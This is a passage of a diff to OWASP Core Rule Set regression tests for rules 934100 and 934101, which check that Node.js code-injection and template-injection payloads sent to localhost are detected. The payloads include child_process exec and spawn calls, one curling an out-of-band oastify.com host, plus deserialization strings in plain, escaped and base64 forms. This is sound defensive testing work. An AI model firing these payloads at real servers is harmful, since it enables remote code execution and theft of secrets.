"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=function%28%29+%7B" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 5 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=new+Function+%28" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=new+Function+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 6 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=this.constructor.constructor" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=this.constructor.constructor" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 7 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=module.exports%3D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=module.exports%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 8 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 9 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 10 desc: process.env test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process.env" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process.env" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 11 desc: console.info test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info(1)" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 12 desc: console.info test (JavaScript escape sequences) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=c%5Cu006fnsole.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=c%5Cu006fnsole.info(1)" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 13 desc: process.env test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=process["env"]' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?foo=process["env"]' + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 14 desc: console.info test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=console["info"](1)' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?foo=console["info"](1)' + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 15 desc: console.info test (call method) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info.call(this,1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info.call(this,1)" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 16 desc: '"process" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process." - version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process." + version: HTTP/1.0 + output: + log: + no_expect_ids: [934100] + - test_id: 17 desc: '"console" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console." - version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console." + version: HTTP/1.0 + output: + log: + no_expect_ids: [934100] + - test_id: 18 desc: ssti test 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 19 desc: ssti test 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 20 desc: ssti test 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5Breq.query.a" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 21 desc: ssti test 4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require%5Breq.query.a" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 22 desc: ssti test 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process%5BmainModule" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5BmainModule" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 23 desc: require child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /get?foo=require("child_process").exec('whoami') - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /get?foo=require("child_process").exec('whoami') + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 24 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - process.env - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + process.env + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [934100] + - test_id: 25 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [934100] + - test_id: 26 desc: "5ZLKNU33" stages: - - stage: - input: + - input: dest_addr: 127.0.0.1 headers: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" @@ -426,89 +423,90 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" - - test_title: 934100-27 + log: + expect_ids: [934100] + - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$ND_FUNC$$_function()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-28 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$ND_FUNC$$_function()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 28 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-29 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 29 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-30 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 30 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-31 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 31 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index 29cfc424f..fbb8fbcfb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml @@ -1,172 +1,170 @@ --- meta: author: "rekter0, azurit" - enabled: true - name: "934101.yaml" - description: "Tests for rule 934101" +rule_id: 934101 tests: - - test_title: 934101-1 + - test_id: 1 desc: additional node ssti tests 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 2 desc: additional node ssti tests 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 3 desc: additional node ssti tests 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 4 desc: require child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require(\"child_process\").exec('whoami')" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require(\"child_process\").exec('whoami')" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 5 desc: require child_process spawn stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" + version: HTTP/1.0 + output: + log: + expect_ids: [934101] + - test_id: 6 desc: "Detect example payload require(... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=require("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=require("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 7 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami') + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 8 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg== + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 9 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934101" - - test_title: 934101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo= + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934101] + - test_id: 10 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - 